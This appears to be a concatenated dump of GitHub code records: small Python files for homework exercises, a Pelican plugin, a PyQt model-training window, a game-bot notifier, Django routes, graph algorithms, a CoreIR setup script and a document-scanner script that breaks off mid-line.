(\"V\", 5), (\"IV\", 4), (\"I\", 1)]\n\ndef int_to_roman(inp_num):\n final_num = \"\"\n \n #check if inp_num is negative\n if inp_num <=0:\n raise ValueError(\"Your number is negative\")\n # (\"Your number is invalid\")\n \n for letter,value in roman_numeral_table:\n while value <= inp_num:\n inp_num -= value\n final_num += letter\n #print(final_num)\n return final_num\nint_to_roman(37120)\n \n#Qn 3, Caesar Cipher\ndef get_value_for_char(inp_msg):\n \n final_str = \"\"\n mesg = inp_msg.replace(\" \", \"\")\n for char in mesg:\n \n char_num = ord(char)\n char_num += 13\n \n if char_num >= 123:\n residue = -(123 - char_num)\n char_num = 97 + residue \n \n #final_list.append(chr(char_num))\n final_str += chr(char_num)\n return final_str\n \nget_value_for_char(\"hello world\")\n ","repo_name":"Ragmthy/ixperience_2018_personal","sub_path":"Week 1 Items/Day1_Hwk.py","file_name":"Day1_Hwk.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19223430016","text":"from pelican.utils import pelican_open\nimport yaml\n\ndef read_with_meta(self, filename):\n with pelican_open(filename) as fp:\n text = list(fp.splitlines())\n\n metadata = {}\n content = ''\n if text[0].rstrip() == '---':\n i = 1\n while len(text) > i:\n if text[i].rstrip() in ('---', '...'):\n break\n i += 1\n metadata_yaml, content = '\\n'.join(text[1:i]), '\\n'.join(text[i+1:])\n for name, value in yaml.load(metadata_yaml).items():\n metadata[name] = self.process_metadata(name, value)\n else:\n for i, line in enumerate(text):\n kv = line.split(':', 1)\n if len(kv) == 2:\n name, value = kv[0].lower(), kv[1].strip()\n if value.startswith('\"') and value.endswith('\"'):\n value = value[0:-1]\n elif value.startswith(\"'\") and value.endswith(\"'\"):\n value = value[0:-1]\n metadata[name] = self.process_metadata(name, value)\n else:\n content = \"\\n\".join(text[i:])\n break\n\n return metadata, content\n\n\n","repo_name":"skydark/skydark.blog","sub_path":"plugins/skydark_helper.py","file_name":"skydark_helper.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"697058391","text":"from PyQt5 import Qt\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.figure import Figure\n\nimport config\nfrom dataset import DataFile\nfrom cnn import CNN\n\n\nclass TrainForm(QMainWindow):\n\n def __init__(self, model: CNN):\n super().__init__()\n self.model = model\n # Set title\n self.setWindowTitle(\"训练模型\")\n self.setWindowModality(Qt.ApplicationModal)\n # Setup panel\n tool_panel = QToolBar()\n self.addToolBar(Qt.LeftToolBarArea, tool_panel)\n tool_panel.setMovable(False)\n # Training options\n tool_panel.addWidget(QLabel(\"训练批量\"))\n self.spin_batch_size = QSpinBox()\n self.spin_batch_size.setMinimum(100)\n self.spin_batch_size.setMaximum(1000)\n self.spin_batch_size.setSingleStep(1)\n self.spin_batch_size.setValue(100)\n tool_panel.addWidget(self.spin_batch_size)\n tool_panel.addWidget(QLabel(\"训练次数\"))\n self.spin_iter = QSpinBox()\n self.spin_iter.setMinimum(100)\n self.spin_iter.setMaximum(100000)\n self.spin_iter.setSingleStep(1)\n self.spin_iter.setValue(100)\n tool_panel.addWidget(self.spin_iter)\n tool_panel.addWidget(QLabel(\"报告间隔\"))\n self.spin_print_iter = QSpinBox()\n self.spin_print_iter.setMinimum(10)\n self.spin_print_iter.setMaximum(1000)\n self.spin_print_iter.setSingleStep(100)\n self.spin_print_iter.setValue(10)\n tool_panel.addWidget(self.spin_print_iter)\n self.check_incremental = QCheckBox(\"增量训练\")\n self.check_incremental.setChecked(True)\n tool_panel.addWidget(self.check_incremental)\n self.btn_start_train = QPushButton(\"开始训练\")\n self.btn_start_train.clicked.connect(self.train_model)\n tool_panel.addWidget(self.btn_start_train)\n self.btn_save_model = QPushButton(\"保存模型\")\n self.btn_save_model.clicked.connect(self.save_model)\n self.btn_save_model.setDisabled(True)\n tool_panel.addWidget(self.btn_save_model)\n tool_panel.addSeparator()\n # Visualization options\n tool_panel.addWidget(QLabel(\"可视化选项\"))\n self.check_plot_loss = QCheckBox(\"可视化损失函数值\")\n self.check_plot_loss.setChecked(True)\n tool_panel.addWidget(self.check_plot_loss)\n self.check_plot_acc = QCheckBox(\"可视化准确率\")\n self.check_plot_acc.setChecked(True)\n tool_panel.addWidget(self.check_plot_acc)\n self.btn_save_image = QPushButton(\"保存图片\")\n self.btn_save_image.clicked.connect(self.save_image)\n tool_panel.addWidget(self.btn_save_image)\n # Setup log board\n self.label_log = QLabel(\"\")\n tool_panel.addSeparator()\n tool_panel.addWidget(self.label_log)\n # Setup progress bar\n tool_progress = QToolBar()\n self.addToolBar(Qt.BottomToolBarArea, tool_progress)\n self.progress_bar = QProgressBar()\n tool_progress.addWidget(self.progress_bar)\n tool_progress.setMovable(False)\n # Setup canvas\n self.figure = Figure()\n self.canvas = FigureCanvas(self.figure)\n self.setCentralWidget(self.canvas)\n # Center windows\n screen_size = QDesktopWidget().screenGeometry()\n frame_size = self.frameSize()\n self.move((screen_size.width() / 2) - (frame_size.width() / 2),\n (screen_size.height() / 2) - (frame_size.height() / 2))\n\n def setLog(self, text):\n self.label_log.setText(text)\n\n def train_model(self):\n # Load data\n self.setLog(\"正在加载数据...\")\n data_file = DataFile(config.data_file)\n if len(data_file) == 0:\n self.setLog(\"无训练数据\")\n return\n train_obs, train_act, test_obs, test_act = data_file.gen_train_set()\n # Clear history\n self.loss_hist = []\n self.acc_hist = []\n # Initialize network\n if not self.check_incremental:\n self.setLog(\"初始化模型\")\n self.model.initialize()\n # Start train\n self.setLog(\"正在训练模型...\")\n self.model.fit(train_obs, train_act, test_obs, test_act,\n batch_size=self.spin_batch_size.value(),\n iters=self.spin_iter.value(),\n print_iters=self.spin_print_iter.value(),\n report_func=self.report_progress)\n self.setLog(\"训练完成\")\n self.btn_save_model.setDisabled(False)\n\n def report_progress(self, iter, hist):\n self.progress_bar.setValue((iter+1) / self.spin_iter.value() * 100)\n if self.check_plot_loss.checkState() and self.check_plot_acc.checkState():\n # Plot loss\n loss = hist['loss']\n loss_plot = self.figure.add_subplot(211)\n loss_plot.clear()\n loss_plot.plot(loss, '*-')\n # Plot acc\n train_acc = hist['train_acc']\n val_acc = hist['val_acc']\n acc_plot = self.figure.add_subplot(212)\n acc_plot.clear()\n acc_plot.plot(train_acc, '*-')\n acc_plot.plot(val_acc, '*-')\n acc_plot.legend([\"train accuracy\", \"test accuracy\"])\n elif self.check_plot_loss.checkState():\n # Plot loss\n loss = hist['loss']\n loss_plot = self.figure.add_subplot(111)\n loss_plot.clear()\n loss_plot.plot(loss, '*-')\n elif self.check_plot_acc.checkState():\n # Plot acc\n train_acc = hist['train_acc']\n val_acc = hist['val_acc']\n acc_plot = self.figure.add_subplot(111)\n acc_plot.clear()\n acc_plot.plot(train_acc, '*-')\n acc_plot.plot(val_acc, '*-')\n acc_plot.legend([\"train accuracy\", \"test accuracy\"])\n self.canvas.draw()\n\n def save_model(self):\n self.btn_save_model.setDisabled(True)\n self.model.save(config.model_file)\n\n def save_image(self):\n file_name, _ = QFileDialog.getSaveFileName(self, \"保存图片\")\n if file_name:\n canvas_size = self.canvas.size()\n canvas_width, canvas_height = canvas_size.width(), canvas_size.height()\n image = QImage(self.canvas.buffer_rgba(), canvas_width, canvas_height, QImage.Format_RGBA8888)\n image.save(file_name)\n","repo_name":"zhenghaoz/cnn-self-driving","sub_path":"controller/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39714620601","text":"\"\"\"A module for detecting and notifying the user of dangerous in-game events.\"\"\"\n\nfrom src.common import config, utils\nimport time\nimport os\nimport cv2\nimport pygame\nimport threading\nimport numpy as np\nimport keyboard as kb\nfrom src.routine.components import Point\n\n\n# A rune's symbol on the minimap\nRUNE_RANGES = (\n ((141, 148, 245), (146, 158, 255)),\n)\nrune_filtered = utils.filter_color(cv2.imread('assets/rune_template.png'), RUNE_RANGES)\nRUNE_TEMPLATE = cv2.cvtColor(rune_filtered, cv2.COLOR_BGR2GRAY)\n\n# Other players' symbols on the minimap\nOTHER_RANGES = (\n ((0, 245, 215), (10, 255, 255)),\n)\nother_filtered = utils.filter_color(cv2.imread('assets/other_template.png'), OTHER_RANGES)\nOTHER_TEMPLATE = cv2.cvtColor(other_filtered, cv2.COLOR_BGR2GRAY)\n\n# The Elite Boss's warning sign\nELITE_TEMPLATE = cv2.imread('assets/elite_template.jpg', 0)\n\n\ndef get_alert_path(name):\n return os.path.join(Notifier.ALERTS_DIR, f'{name}.mp3')\n\n\nclass Notifier:\n ALERTS_DIR = os.path.join('assets', 'alerts')\n\n def __init__(self):\n \"\"\"Initializes this Notifier object's main thread.\"\"\"\n\n pygame.mixer.init()\n self.mixer = pygame.mixer.music\n\n self.ready = False\n self.thread = threading.Thread(target=self._main)\n self.thread.daemon = True\n\n self.room_change_threshold = 0.9\n self.rune_alert_delay = 270 # 4.5 minutes\n\n def start(self):\n \"\"\"Starts this Notifier's thread.\"\"\"\n\n print('\\n[~] Started notifier')\n self.thread.start()\n\n def _main(self):\n self.ready = True\n prev_others = 0\n rune_start_time = time.time()\n while True:\n if config.enabled:\n frame = config.capture.frame\n height, width, _ = frame.shape\n minimap = config.capture.minimap['minimap']\n\n # Check for unexpected black screen\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if np.count_nonzero(gray < 15) / height / width > self.room_change_threshold:\n self._alert('siren')\n\n # Check for elite warning\n elite_frame = frame[height // 4:3 * height // 4, width // 4:3 * width // 4]\n elite = utils.multi_match(elite_frame, ELITE_TEMPLATE, threshold=0.9)\n if len(elite) > 0:\n self._alert('siren')\n\n # Check for other players entering the map\n filtered = utils.filter_color(minimap, OTHER_RANGES)\n others = len(utils.multi_match(filtered, OTHER_TEMPLATE, threshold=0.5))\n config.stage_fright = others > 0\n if others != prev_others:\n if others > prev_others:\n self._ping('ding')\n prev_others = others\n\n # Check for rune\n now = time.time()\n if not config.bot.rune_active:\n filtered = utils.filter_color(minimap, RUNE_RANGES)\n matches = utils.multi_match(filtered, RUNE_TEMPLATE, threshold=0.9)\n rune_start_time = now\n if matches and config.routine.sequence:\n abs_rune_pos = (matches[0][0], matches[0][1])\n config.bot.rune_pos = utils.convert_to_relative(abs_rune_pos, minimap)\n distances = list(map(distance_to_rune, config.routine.sequence))\n index = np.argmin(distances)\n config.bot.rune_closest_pos = config.routine[index].location\n config.bot.rune_active = True\n self._ping('rune_appeared', volume=0.75)\n elif now - rune_start_time > self.rune_alert_delay: # Alert if rune hasn't been solved\n config.bot.rune_active = False\n self._alert('siren')\n time.sleep(0.05)\n\n def _alert(self, name, volume=0.75):\n \"\"\"\n Plays an alert to notify user of a dangerous event. Stops the alert\n once the key bound to 'Start/stop' is pressed.\n \"\"\"\n\n config.enabled = False\n config.listener.enabled = False\n self.mixer.load(get_alert_path(name))\n self.mixer.set_volume(volume)\n self.mixer.play(-1)\n while not kb.is_pressed(config.listener.config['Start/stop']):\n time.sleep(0.1)\n self.mixer.stop()\n time.sleep(2)\n config.listener.enabled = True\n\n def _ping(self, name, volume=0.5):\n \"\"\"A quick notification for non-dangerous events.\"\"\"\n\n self.mixer.load(get_alert_path(name))\n self.mixer.set_volume(volume)\n self.mixer.play()\n\n\n#################################\n# Helper Functions #\n#################################\ndef distance_to_rune(point):\n \"\"\"\n Calculates the distance from POINT to the rune.\n :param point: The position to check.\n :return: The distance from POINT to the rune, infinity if it is not a Point object.\n \"\"\"\n\n if isinstance(point, Point):\n return utils.distance(config.bot.rune_pos, point.location)\n return float('inf')\n","repo_name":"tanjeffreyz/auto-maple","sub_path":"src/modules/notifier.py","file_name":"notifier.py","file_ext":"py","file_size_in_byte":5183,"program_lang":"python","lang":"en","doc_type":"code","stars":315,"dataset":"github-code","pt":"52"} +{"seq_id":"25965866510","text":"# Cross Platform GUI development with PySimpleGUI\n# cerner_2tothe5th_2021\n# Simple example of using PySimpleGUI to create cross platform GUIs. \n# Install PySimpleGUI using \"pip3 install pysimplegui\"\n\nimport PySimpleGUI as sg\n\ndef main():\n layout = [\n [\n [sg.Text(\"Hello, it's day 4. Let's build a cross platform GUI .\", font='20')],\n [sg.Button('Click Me', key='CLICKME', font=20), sg.Button('Exit', font=20)],\n [sg.Output(font=20)]\n ]\n ]\n window = sg.Window(\"Window\", layout)\n\n while True:\n event, values = window.read()\n if event is None or event == 'Exit':\n return\n if event == 'CLICKME':\n print(\"Yay, you clicked the button. Think of the possibilities. \")\nmain()","repo_name":"magicmicah/cerner_2_to_5_2021","sub_path":"day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11625605538","text":"import math\n\nn = int(input())\nar,ar1 = [],[]\n\nfor x in range(n):\n ar.append(int(input()))\n\nfor x in ar:\n if x < 38:\n ar1.append(x)\n elif x >= 38:\n temp = math.ceil(x/5)\n temp = temp*5\n temp2 = temp-x\n if temp2 < 3:\n ar1.append(temp)\n else:\n ar1.append(x)\n\nprint(*ar1,sep = \"\\n\")\n","repo_name":"saifeemustafaq/hackerrankproblemsolving","sub_path":"grading_students.py","file_name":"grading_students.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"23856139771","text":"import math\n\nr1, c1 = map(int, input().split(\" \"))\nr2, c2 = map(int, input().split(\" \"))\n\nif r1 == r2 and c1 == c2:\n print(0)\n exit()\n\nif r1 + c1 == r2 + c2 or r1 - c1 == r2 - c2 or abs(c1 - c2) + abs(r1 -\n r2) <= 3:\n print(1)\n exit()\n\nif abs(r1 - c1) + abs(r2 - c2) % 2 == 0:\n print(2)\n exit()\n\nb1 = c1 - r1\nb2 = c2 + r2\nx = abs(b1 - b2) // 2\ny = (abs(b1 - b2) // 2) + b1\nif (abs(c1 - y) + abs(r1 - x) <= 3) or (abs(y - c2) + abs(x - r2) <= 3):\n print(2)\nelse:\n print(3)\n","repo_name":"kazztech/atcoder","sub_path":"20201122_abc184/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72813003044","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_view\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('register/', views.register, name='register'),\n path('profile/', views.profile, name='profile'),\n path('dashboard/', views.dashboard, name='dashboard'),\n path('maps/', views.maps, name='maps'),\n path('admin_view/', views.admin_view, name='admin_view'),\n path('download_data/', views.download_data, name='download_data'),\n path('manage_data/', views.manage_data, name='manage_data'),\n path('delete_file/', views.delete_file, name='delete_file'),\n path('upload/', views.upload_file, name='upload_file'),\n path('upload_success/', views.upload_success, name='upload_success'),\n path('edit_user/', views.edit_user, name='edit_user'), \n path('update_user/', views.update_user, name='update_user'),\n path('delete_user/', views.delete_user, name='delete_user'),\n path('login/', auth_view.LoginView.as_view(template_name='users/login.html'), name=\"login\"),\n path('logout/', auth_view.LogoutView.as_view(template_name='users/logout.html'), name=\"logout\"),\n]\n","repo_name":"WesleyWanyama/136895","sub_path":"webinfo/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41769958223","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndriver = webdriver.Firefox()\ndriver.get(\"https://docs.google.com/forms/d/e/1FAIpQLSc3Wp9C6pR2g4KpPgclcJCsN_U7jdc0rWRLk1R4jkj3uxyUpA/viewform\")\ntime.sleep(3)\n\ndiscord_tag = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerViewNumberedItemContainer:nth-child(1) > div:nth-child(1) > div:nth-child(1) > div:nth-child(2) > div:nth-child(1) > div:nth-child(1) > div:nth-child(1) > div:nth-child(1) > input:nth-child(1)\")\ndiscord_tag.send_keys(\"!!!ahhhhh!!!#7441\")\nrepo = driver.find_element(By.CSS_SELECTOR, \".freebirdFormviewerComponentsQuestionTextUrl > div:nth-child(1) > div:nth-child(1) > div:nth-child(1) > input:nth-child(1)\")\nrepo.send_keys(\"https://github.com/Kev-in123/Python-Automation-Thingy\")\nsomething = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerComponentsQuestionRadioChoice:nth-child(1) > label:nth-child(1)\")\nsomething.click()\ntags1 = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerComponentsQuestionCheckboxChoice:nth-child(1) > label:nth-child(1)\")\ntags1.click()\ntags2 = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerComponentsQuestionCheckboxChoice:nth-child(2) > label:nth-child(1)\")\ntags2.click()\ntype = driver.find_element(By.CSS_SELECTOR, \"div.freebirdFormviewerViewNumberedItemContainer:nth-child(5) > div:nth-child(1) > div:nth-child(1) > div:nth-child(2) > div:nth-child(1) > div:nth-child(1) > div:nth-child(1) > div:nth-child(1) > input:nth-child(1)\")\ntype.send_keys(\"something\")\npick = driver.find_element(By.CSS_SELECTOR, \".quantumWizMenuPaperselectEl\")\npick.click()\noption1 = driver.find_element(By.CSS_SELECTOR, \".exportSelectPopup > div:nth-child(3) > span:nth-child(2)\")\noption1.click()\nsubmit = driver.find_element(By.CSS_SELECTOR, \".appsMaterialWizButtonPaperbuttonFilled > span:nth-child(3)\")\nsubmit.click()\n\ntime.sleep(3)\ndriver.close()\n","repo_name":"Kev-in123/Python-Automation","sub_path":"src/Intro to Automation with Python - Challenge.py","file_name":"Intro to Automation with Python - Challenge.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"428415977","text":"from heapq import *\nfrom copy import copy\nfrom ..graph.vertex_edge import Vertex, Edge\nfrom ..graph.graph import Graph\nfrom ..graph.orientedGraph import OrientedGraph\nfrom .search import get_connected_components\n\n\ndef all_shortest_paths(graph):\n \"\"\"\n Floyd-Warshall algorithm.\n\n Parameters\n ----------\n 'graph' : a Graph object\n graph on which to perform the algorithm\n\n Returns\n -------\n A matrix M (list of list) where M[i][j] = the length of the\n shortest path from vertex i to vertex j\n \"\"\"\n adj = copy(graph.adjacency_matrix())\n n = len(adj)\n for i in range(n):\n for j in range(n):\n if adj[i][j] == 0 and i != j:\n adj[i][j] = float(\"inf\")\n for k in range(n):\n for i in range(n):\n for j in range(n):\n adj[i][j] = min(adj[i][j], adj[i][k]+adj[k][j])\n return adj\n\n\ndef shortest_path(graph, v_start, v_end, heuristic):\n \"\"\"\n A* algorithm\n\n Parameters\n ----------\n 'graph' : a Graph object\n graph on which to perform the search\n\n 'v_start' : a Vertex object\n Starting point of the algorithm\n\n 'v_end' : a Vertex object\n Target point of the algorithm\n\n 'heuristic' : a function (Vertex a, Vertex b) -> weight\n Evaluate the remaining distance from a to b\n\n Returns\n -------\n The length l and the sequence of vertices of (one of the) shortest\n paths from v_start to v_end\n \"\"\"\n heap = [(0, 0, 0, v_start, None)]\n dist = dict()\n origin = dict()\n t = 0\n while len(heap) != 0 and v_end not in dist:\n _, weight, _, node, father = heappop(heap)\n if node in dist:\n continue\n dist[node] = weight\n origin[node] = father\n for edge in graph.get_neighbours_edge(node):\n neighbour = edge.other(node)\n if neighbour not in dist:\n t += 1\n realweight = weight + edge[\"weight\"]\n fakeweight = realweight + heuristic(neighbour, v_end)\n heappush(heap, (fakeweight, realweight, t, neighbour, node))\n\n def recover(node):\n ans = []\n while node is not None:\n ans.append(node)\n node = origin[node]\n return ans[::-1]\n if v_end not in dist:\n return float(\"inf\"), []\n return dist[v_end], recover(v_end)\n\n\ndef dijkstra(graph, v_start, v_end):\n \"\"\"\n Dijkstra's algorithm\n\n Parameters\n ----------\n 'graph' : a Graph object\n graph on which to perform the search\n\n 'v_start' : a Vertex object\n Starting point of the algorithm\n\n 'v_end' : a Vertex object\n Target point of the algorithm\n\n Returns\n -------\n The length l and the sequence of vertices of (one of the) shortest\n paths from v_start to v_end\n \"\"\"\n def no_heuristic(a, b):\n return 0\n return shortest_path(graph, v_start, v_end, no_heuristic)\n\n\ndef bellman_ford(graph, s):\n nbnodes = len(graph.vertices())\n dist = {vertex: float(\"inf\") for vertex in graph.vertices()}\n dist[s] = 0\n for _ in range(nbnodes-1):\n for edge in graph.edges(erase_multiple=False):\n dist[edge.end] = min(\n dist[edge.end], dist[edge.start] + edge[\"weight\"])\n for edge in graph.edges(erase_multiple=False):\n if dist[edge.start] + edge[\"weight\"] < dist[edge.end]:\n raise Exception(\"Negative cycle has been found\")\n return dist\n\n\ndef diameter(graph):\n \"\"\"\n The diameter is defined as the longest shortest path among all pairs\n of vertices. It is by convention infinite for non-connected graphs\n\n Parameters\n ----------\n 'graph' : a Graph object\n The graph on which to perform the algorithm\n\n Returns\n -------\n The diameter of the graph.\n \"\"\"\n paths = all_shortest_paths(graph)\n n = len(paths)\n maxi = -float(\"inf\")\n for i in range(n):\n for j in range(n):\n if paths[i][j] >= maxi:\n maxi = paths[i][j]\n return maxi\n\n\ndef biggest_component_diameter(graph):\n \"\"\"\n Computes the diameter of the biggest component of the graph\n\n Parameters\n ----------\n 'graph' : a Graph object\n The graph on which to perform the algorithm\n\n Returns\n -------\n The diameter of the biggest component of the graph\n \"\"\"\n comp_list = get_connected_components(graph)\n n = 0\n biggest = -1\n for i in range(len(comp_list)):\n if len(comp_list[i]) > n:\n n = len(comp_list[i])\n biggest = i\n return diameter(Graph.renumber(comp_list[biggest]))\n","repo_name":"GCoiffier/graph_tools","sub_path":"graphtool/algorithms/path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":4700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38780087701","text":"import subprocess\nimport os\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\nfrom distutils.command.build import build\nimport glob\nimport shutil\nimport sys\nimport platform\nimport multiprocessing\n\n\n_system = platform.system()\nif _system == \"Linux\":\n extra_libs = []\n lib_ext = \"so\"\n static_build = True\nelif _system == \"Darwin\":\n extra_libs = [\"coreir\", \"coreirsim\"]\n lib_ext = \"dylib\"\n # osx default xcode doesn't support static build\n static_build = False\nelse:\n raise NotImplementedError(_system)\n\nif os.environ.get('TRAVIS') == 'true':\n njobs = 2\nelse:\n try:\n cpus = len(os.sched_getaffinity(0))\n except AttributeError:\n cpus = multiprocessing.cpu_count()\n njobs = max(2, cpus)\n\nCOREIR_PATH = \"coreir-cpp\"\nCOREIR_REPO = \"https://github.com/rdaly525/coreir\"\nCOREIR_NAME = \"coreir\"\nCOREIR_BRANCH = \"master\"\n\n\nTEXT_CHARS = bytearray({7, 8, 9, 10, 12, 13, 27} | set(range(0x20, 0x100)) -\n {0x7f})\n\n\ndef is_binary_string(bytes):\n return bool(bytes.translate(None, TEXT_CHARS))\n\n\ndef is_binary(path):\n # adapted from https://stackoverflow.com/a/7392391\n with open(path, \"rb\") as f:\n return is_binary_string(f.read(1024))\n\n\nCOREIR_BINARY_PATH = None\nfor line in os.popen(\"which -a coreir\").read().splitlines():\n if is_binary(line):\n COREIR_BINARY_PATH = line\n break\n\n\nclass CoreIRExtension(Extension):\n def __init__(self, name, sourcedir=''):\n Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\n\nclass CoreIRBuild(build_ext):\n libs = [\"coreir-c\", \"coreirsim-c\", \"coreir-ice40\", \"coreir-aetherlinglib\",\n \"coreir-commonlib\", \"coreir-float\", \"coreir-rtlil\",\n \"coreir-float_CW\", \"coreir-float_DW\", \"verilogAST\"] + extra_libs\n\n def run(self):\n # skip if coreir binary is found. this is useful if people want\n # to use their own version of coreir\n\n if COREIR_BINARY_PATH is not None:\n # we're done here since users provide their own coreir distribution\n return\n\n # we only have one extension\n assert len(self.extensions) == 1\n ext = self.extensions[0]\n extdir = \\\n os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))\n extdir = os.path.join(extdir, COREIR_NAME)\n if not os.path.isdir(extdir):\n os.mkdir(extdir)\n\n if not os.path.isdir(COREIR_PATH):\n subprocess.check_call([\"git\", \"clone\", \"--depth=1\", \"--branch\",\n COREIR_BRANCH, COREIR_REPO, COREIR_PATH])\n build_dir = os.path.join(COREIR_PATH, \"build\")\n\n if static_build:\n subprocess.check_call([\"cmake\", \"-DSTATIC=ON\", \"..\"],\n cwd=build_dir)\n else:\n subprocess.check_call([\"cmake\", \"..\"], cwd=build_dir)\n\n for lib_name in self.libs:\n subprocess.check_call([\"make\", \"-C\", build_dir, f\"-j{njobs}\",\n lib_name])\n # make the binary\n subprocess.check_call([\"make\", \"-C\", build_dir, f\"-j{njobs}\",\n \"coreir-bin\"])\n\n # copy libraries over\n for lib_name in self.libs:\n filename = os.path.join(\n COREIR_PATH, \"build\", \"lib\",\n \"lib{}.{}\".format(lib_name, lib_ext)\n )\n shutil.copy(filename, extdir)\n\n # copy binary over\n filename = os.path.join(COREIR_PATH, \"build\", \"bin\", \"coreir\")\n shutil.copy(filename, extdir)\n\n\nscripts = []\nif not COREIR_BINARY_PATH:\n scripts.append(\"bin/coreir\")\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name='coreir',\n version='2.0.156',\n description='Python bindings for CoreIR',\n packages=[\"coreir\"],\n license='BSD License',\n url='https://github.com/leonardt/pycoreir',\n author='Leonard Truong',\n author_email='lenny@cs.stanford.edu',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n install_requires=[\"hwtypes\"],\n ext_modules=[CoreIRExtension('coreir')],\n scripts=scripts,\n cmdclass=dict(build_ext=CoreIRBuild),\n zip_safe=False\n)\n","repo_name":"leonardt/pycoreir","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"37647124351","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Hotels\nfrom .serializers import HotelSerializers\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\ndef home(request):\n return HttpResponse(\"

Hello Canada

\")\n\n\n@api_view(['GET', 'POST'])\ndef hotel_details(request):\n if request.method == \"GET\":\n hotel_list = Hotels.objects.all()\n hotel_get_serializer =HotelSerializers(hotel_list, many=True)\n return Response(hotel_get_serializer.data)\n if request.method == \"POST\":\n hotel_val = request.data\n hotel_post_serializer = HotelSerializers(data=hotel_val)\n if hotel_post_serializer.is_valid():\n hotel_post_serializer.save()\n return Response({\"Message\": \"Added Successfully\"})\n\n\n@api_view(['GET'])\ndef hotel_filters(request, pk):\n if request.method == \"GET\":\n hotel_list = Hotels.objects.get(id=pk)\n hotel_get_serializer = HotelSerializers(hotel_list, many=False)\n return Response(hotel_get_serializer.data)\n\n","repo_name":"A00453339/Django_Assignment","sub_path":"DjangoPrj/DjangoApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43100819408","text":"# Importing necessary libraries\nimport cv2\nimport numpy as np\nimport requests\nimport imutils\nimport os\n\n# Setting up IP webcam to connect to an Android phone \nurl = 'http://192.168.1.104:8080/shot.jpg'\nframeWidth = 640 \nframeHeight = 480\n\ndef preprocessImage(img):\n # converting to grayscale\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # blurring\n imgBlur = cv2.blur(imgGray, (5, 5), 1)\n # generate canny features\n imgCanny = cv2.Canny(imgBlur, 100, 150)\n\n #Next, we will pass the image through 2 passes of dilation & 1 pass of erosion\n #so as to make the edges more visible\n kernel = np.ones((5, 5))\n imgDil = cv2.dilate(imgCanny, kernel, iterations=2)\n imgEros = cv2.erode(imgDil, kernel, iterations=1)\n\n return imgEros\n\ndef getContours(img):\n contours, _ = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n \n maxArea = 0\n biggest = np.array([])\n\n for cnt in contours:\n area = cv2.contourArea(cnt)\n\n if area > 5000:\n cv2.drawContours(frameCnt, cnt, -1, (255, 0, 0), 3)\n perimeter = cv2.arcLength(cnt, True)\n approx = cv2.approxPolyDP(cnt, 0.02*perimeter, True)\n\n if area > maxArea and len(approx) == 4:\n biggest = approx\n maxArea = area\n \n return biggest\n\n# Warp the image and get a perspective transform on the biggest contour portion\ndef getWarp(img, biggest):\n biggest = reorder(biggest)\n pts1 = np.float32(biggest)\n pts2 = np.float32([[0,0], [frameWidth, 0], [0, frameHeight], [frameWidth, frameHeight]])\n\n matrix = cv2.getPerspectiveTransform(pts1, pts2)\n imgOutput = cv2.warpPerspective(img, matrix, (frameWidth, frameHeight))\n\n return imgOutput\n\n# Reorders the warp points \ndef reorder(points):\n points = points.reshape((4, 2))\n newPoints = np.zeros((4, 1, 2), np.int32)\n\n sum = points.sum(1)\n diff = np.diff(points, axis=1)\n\n newPoints[0] = points[np.argmin(sum)]\n newPoints[1] = points[np.argmin(diff)]\n newPoints[2] = points[np.argmax(diff)]\n newPoints[3] = points[np.argmax(sum)]\n\n return newPoints\n\n\n\nwhile cv2.waitKey(1) != 27: # press ESC to break out\n img_resp = 